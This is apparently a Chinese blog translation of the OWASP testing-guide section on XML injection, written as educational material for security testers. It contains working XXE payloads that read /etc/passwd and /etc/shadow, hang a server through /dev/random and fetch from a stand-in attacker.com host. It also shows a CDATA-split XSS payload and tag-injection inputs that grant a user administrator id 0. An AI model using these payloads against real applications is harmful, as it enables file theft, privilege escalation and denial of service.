xxe测试(owasp)

最新推荐文章于 2024-07-18 15:19:39 发布
最新推荐文章于 2024-07-18 15:19:39 发布
阅读量832 收藏
点赞数
分类专栏: 初级 web安全 xxe
原文链接:https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection
版权
初级 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
web安全
10 篇文章 0 订阅
订阅专栏
xxe
2 篇文章 0 订阅
订阅专栏
本文详细介绍了XML注入的概念和测试方法,包括识别注入点、利用特殊字符测试、标签注入以及外部实体注入(XXE)。通过实例展示了如何通过注入XML数据和标签来篡改数据,甚至提权。同时,讨论了防止此类攻击的源码审查和工具选择。
摘要由CSDN通过智能技术生成

原文

概述

本章演示实际XML注入例子。首先,将定义XML样式的通信,并且解释其工作原理。然后尝试插入XML字符的发现方法。当第一步完成,测试中将拥有许多关于XML结构的信息,因此将有可能插入XML数据和标签。

测试目的
  • 识别XML注入点
  • 评估可以利用的攻击类型及其严重性
如何测试

让我们假设有个网站使用XML样式的通信进行用户注册。这通过在xmlDb中创建和添加新的< user>实现。
让我们假设xmlDB文件如下:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>0</userid>
        <mail>gandalf@middleearth.com</mail>
    </user>
    <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <userid>500</userid>
        <mail>Stefan0@whysec.hmm</mail>
    </user>
</users>

当用户通过填写html表格注册时,该应用收到在GET请求中的用户数据(为了简单,就当成GET请求)。
例如下面的数据:

Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com

将产生请求:

http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com

网站将创建以下节点:

<user>
    <username>tony</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
</user>

这个将添加到xmlDB中

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>0</userid>
        <mail>gandalf@middleearth.com</mail>
    </user>
    <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <userid>500</userid>
        <mail>Stefan0@whysec.hmm</mail>
    </user>
    <user>
    <username>tony</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
    </user>
</users>
发现

测试XML注入漏洞的第一步。XML的元字符为:

  • 单引号:' - 当没有被过滤时,如果注入点是标签中的属性值,这个字符能够在xml解析时引发异常。

举例:让我们假设有以下属性

<node attrib='$inputValue'/>

如果存在

inputValue = foo'

没有被过滤,且插入到此处属性中

<node attrib='foo''/>

然后,生成的xml文件格式不正确。

  • 双引号:" -这个字符和单引号一样,它能够被用在属性被双引号闭合的场景中。
<node attrib="$inputValue"/>
  • 尖括号:<> - 通过在用户输入中添加一个尖括号如下:
Username = foo<

应用将构建一个新的节点:

<user>
    <username>foo<</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
</user>

但因为存在多余的’<’,生成的xml文件将无效。

  • 注释标记:<!--/--> - 这一串字符会被解析为注释的开头/结尾。因此通过在username参数中注入他们中的一个:
Username = foo<!--

应用将构成以下节点:

<user>
    <username>foo<!--</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
</user>

这不是有效的xml序列。

在这里插入代码片
  • Ampersand:& - 在xml语法中,这个符号表示实体。实体的格式是&symbol。一个实体映射到unicode字符中的字符。

举例:

<tagnode>&lt;</tagnode>

是格式正确且有效的,表示ascii字符中的<
如果&没有被编码为&amp;,则它是可以被用来测试xml注入。
事实上,如果输入如下:

Username = &foo

一个新节点将被生成:

<user>
    <username>&foo</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
</user>

但是,此文件是无效的:&foo并没有终止,并且&foo;是未被定义的。

  • CDATA(意为character data,表示文档的特定部分是普通的字符数据)定界符: <![CDATA[ / ]]> - CDATA被用于转义包含字符的文本块,否则这些文本字符将被视为标记。也就是说,在CDATA中的字符将不会被xml解析器解析。

举例,如果有在文本节点中表示<foo>的需求:

<node>
    <![CDATA[<foo>]]>
</node>

<foo>不会被解析,被认为是字符数据。
如果节点以以下方式创建:

<username><![CDATA[<$userName]]></username>

测试者能够尝试注入CDATA的结尾字符串]]>,使生成的xml文件无效。

userName = ]]>

xml文件将变成:

<username><![CDATA[]]>]]></username>

另一个测试和CDATA标签有关。假设xml文件将被处理生成一个html页面。在这种情况下,CDATA定界符将简单地消除,无需进一步查看它的内容。然而,它有可能注入html标记,这些标记被包含在生成的页面中,完全绕过存在的过滤规则。
举个具体的例子。假设我们有一个包含一些文本的节点,它将会显示给用户。

<html>
    $HTMLCode
</html>

然后,攻击者可能使用以下输入:

$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

从而获得以下节点:

<html>
    <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>

在xml解析器处理时,CDATA定界符会被消除,生成以下html代码:

<script>
    alert('XSS')
</script>

结果此应用易受到XSS漏洞的攻击。

外部实体:可以通过定义新的实体来扩展有效实体集。如果实体的定义是URI,这个实体叫做外部实体。除非配置为其他方式,否则外部实体会强制xml解析器访问URI所指定的资源。例如,一个在本地的文件或在远程系统中的文件。这个行为使xml外部实体易受到攻击,它能够被用来执行本地系统的拒绝服务、获得未授权访问的本地文件内容,扫描远程机器、以及执行远程系统的拒绝服务。

为了测试XXE漏洞,你可以使用以下输入:

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///dev/random" >]>
        <foo>&xxe;</foo>

这个测试能使web服务器崩溃(unix系统),如果xml解析器尝试用/dev/random文件的内容代替实体的话。
其他可用的测试如下:

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
标签注入

一旦第一步完成,测试者拥有一些关于xml文件结构的信息。然后,可以尝试注入xml数据和标签。我们会展示一个例子,关于如何使用它进行提权。
让我们回想之前的应用,桐哥插入以下值:

Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com

应用将创建新的节点,且将它添加到xml数据库中。

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>0</userid>
        <mail>gandalf@middleearth.com</mail>
    </user>
    <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <userid>500</userid>
        <mail>Stefan0@whysec.hmm</mail>
    </user>
    <user>
        <username>tony</username>
        <password>Un6R34kb!e</password>
        <userid>500</userid>
        <mail>s4tan@hell.com</mail>
        <userid>0</userid>
        <mail>s4tan@hell.com</mail>
    </user>
</users>

生成的xml文件格式是正确的。此外,与userid标签关联的值可能为0(管理员id)(对用户tony来说)。也就是说,我们为用户注入了管理权限。

唯一的问题使userid标记在最后一个用户节点中出现了两次。通常,xml文件与模式或DTD相关联,如果它们不符合要求,则将被拒绝。
让我们假设xml文件被以下DTD指定:

<!DOCTYPE users [
    <!ELEMENT users (user+) >
    <!ELEMENT user (username,password,userid,mail+) >
    <!ELEMENT username (#PCDATA) >
    <!ELEMENT password (#PCDATA) >
    <!ELEMENT userid (#PCDATA) >
    <!ELEMENT mail (#PCDATA) >
]>

注意,userid节点是用基数1定义的。在这种情况下,如果xml文件在被处理前根据此DTD进行验证,则我们之前展示的攻击以及其他简单的攻击将不起作用。

但是,如果测试者控制有问题的节点之前的某些节点的值(如userid),这个问题能够被解决。事实上,测试者能够注释一些节点,桐哥注入注释的开头和结尾语句:

Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>s4tan@hell.com

在这种情况下,我们最终的xml数据库会变成:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>0</userid>
        <mail>gandalf@middleearth.com</mail>
    </user>
    <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <userid>500</userid>
        <mail>Stefan0@whysec.hmm</mail>
    </user>
    <user>
        <username>tony</username>
        <password>Un6R34kb!e</password><!--</password>
        <userid>500</userid>
        <mail>--><userid>0</userid><mail>s4tan@hell.com</mail>
    </user>
</users>

原始的userid节点会被注释,只剩下被注入的userid。现在此文件符合DTD规则了。

源码审查

以下jaca api可能会受到xxe攻击,如果它们没用被正确配置。

javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuildFactory
org.xml.sax.EntityResolver
org.dom4j.*
javax.xml.parsers.SAXParser
javax.xml.parsers.SAXParserFactory
TransformerFactory
SAXReader
DocumentHelper
SAXBuilder
SAXParserFactory
XMLReaderFactory
XMLInputFactory
SchemaFactory
DocumentBuilderFactoryImpl
SAXTransformerFactory
DocumentBuilderFactoryImpl
XMLReader
Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser

检查源码,docType、external DTD和外部参数实体是否被设置为禁止使用。

(最后一点略了)

工具

个人小总结

个人感觉测试内容主要就是通过各种特殊字符测试是否会报错,特殊字符包括单引号'、双引号"、尖括号<>、注释符号<!--/-->、逻辑与&、CDATA定界符<![CDATA[]]>

如果不会报错的话,就能够进行标签注入(替换原来的userid标签)、外部实体注入(xxe)、嵌入xss代码等测试。

流口水的柠檬精
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
33-4 XXE漏洞 - xxe判断
weixin_43263566的博客
04-02 188
【代码】33-4 XXE漏洞 - xxe判断。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6555
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
【网络安全渗透测试零基础入门必知必会】之XML外部实体注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
jennycisp的博客
07-18 1387
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段文件XXE渗透与防御第1篇。本文主要讲解XML外部实体注入XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
XXE漏洞检测及代码执行过程
weixin_30505751的博客
04-08 564
   这两天看了xxe漏洞,写一下自己的理解,xxe漏洞主要针对webservice危险的引用的外部实体并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目录遍历等.首先存在漏洞的web服务一定是存在xml传输数据的,可以在http头的content-type中查看,也可以根据url一些常见的关键字进行判断测试,例如wsdl(web服务描述语言).或者一些常见的采用xml的java服务配置...
XXEOWASP)(翻译)
qq_1062290728的博客
03-08 265
原文 介绍 XML外部实体攻击对解析XML输入的网站的一种攻击。这种攻击在含外部实体引用的XML被配置不当的XML解析器执行时发生。这种攻击i可能引起数据泄露、服务拒绝、服务端请求伪造、解析器所在的主机的端口扫描等其他系统影响。 XML 1.0标准定义了XML文件的结构。标准定义了一个概念,实体,它时某些类型的存储单元。这里有一些不同类型的实体:外部通用实体/参数解析实体,经常被简称为外部实体,它们能够访问本地或远程内容,通过声明的系统标识符。系统标识符被假设为URI,能够被XML处理器访问。XML处理器用
OWASP TOP10(2017)之【XML 外部实体(XXE)】
qq_41042211的博客
07-20 523
XML以及XXE漏洞介绍 XML是指可扩展标记语言,用来传输和存储数据。XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素。XML的焦点是数据的内容,它把数据从HTML分离,是独立于软件和硬件的信息传输工具。HTML旨在显示信息,XML旨在传输和存储信息。 XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞。XXE漏洞发生在应用程序解析XML时,没有禁止外部实体的加载,导致客家在恶意外部文件,造成文件读取,命令执行,内网端口扫描,攻击内网网
OWASP_Broken_Web_Apps_VM_1.2
02-16
**OWASP Broken Web Apps VM**(虚拟机)是OWASP基金会推出的一个用于安全测试的学习平台。它包含了多个故意设计成存在安全漏洞的应用程序,旨在为网络安全学习者提供一个安全的实验环境来模拟真实的攻击场景,从而...
XXE - How to become a Jedi
02-20
2. **工具扫描**:使用自动化工具对应用进行扫描,如 OWASP ZAP 或 Burp Suite 等。 3. **手动测试**:构建含有恶意实体引用的 XML 文档并发送给目标应用,观察其行为。 #### 防御措施 为了防止 XXE 漏洞的发生,...
DVWA靶场,集成了owasp top 10漏洞
03-28
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专为网络安全专业人士设计,用于学习和测试各种Web安全漏洞。这个靶场集成了OWASP(Open Web Application Security Project)的Top 10漏洞,这些...
OWASP Top 10 2017 v1.3中文最新版.pdf
08-25
4. **A4:2017 - XML外部实体(XXE)**:XML解析器的漏洞,允许攻击者读取服务器上的文件或执行远程代码。 5. **A5:2017 - 失效的访问控制**:如果应用程序没有正确实施权限和角色管理,攻击者可能获取不应有的访问...
OWASP TOP 10
07-08
2017版的OWASP TOP 10覆盖了当时网络应用安全领域中最严重的十个问题,并且被广泛地用于教育、培训、安全测试以及安全合规性评估。它基于对安全专家们的调查,以及对漏洞数据库、安全事件和应用安全案例研究的分析。...
探索与利用:XXE漏洞利用工具——XXEclient
gitblog_00099的博客
05-29 330
探索与利用:XXE漏洞利用工具——XXEclient xxe-recursive-download项目地址:https://gitcode.com/gh_mirrors/xx/xxe-recursive-download 在这个数字时代,网络安全的重要性不言而喻。今天,我们要向你介绍一个强大的开源项目——XXEclient,它是一个专门用于通过XML外部实体(XXE)漏洞获取目标服务器文件的工具...
XXE漏洞
qi_SJQ_的博客
01-21 567
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
XXE外部实体注入漏洞之——漏洞攻防测试
温柔小薛的博客
04-12 768
漏洞攻防测试 概述 利用 xxe 漏洞可以进行拒绝服务攻击(插入DOS攻击),文件读取,命令(代码)执行(需要在编译安装php时,将命令执行模块也安装了),SQL(XSS)注入,内外扫描端口(远程包含漏洞),入侵内网站点等,内网探测和入侵是利用 xxe 中支持的协议进行内网主机和端口发现,可以理解是使用 xxe 进行 SSRF 的利用,基本上都能做 一般 xxe 利用分为两大场景:有回显和无回显。...
【网络安全】web漏洞-xml外部实体注入(XXE)
A1_3_9_7的博客
12-28 1148
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
windows文件读取 xxe_【分享】XXE 暴力枚举字典
weixin_42503482的博客
12-06 95
XXE漏洞全称XML External Entity Injection即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、×××内网网站、发起dos×××等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。以下是一个XXE...
【渗透测试XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1598
XXE漏洞发生在应用程序解析XML输入时,并没有禁止外部实体的加载,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值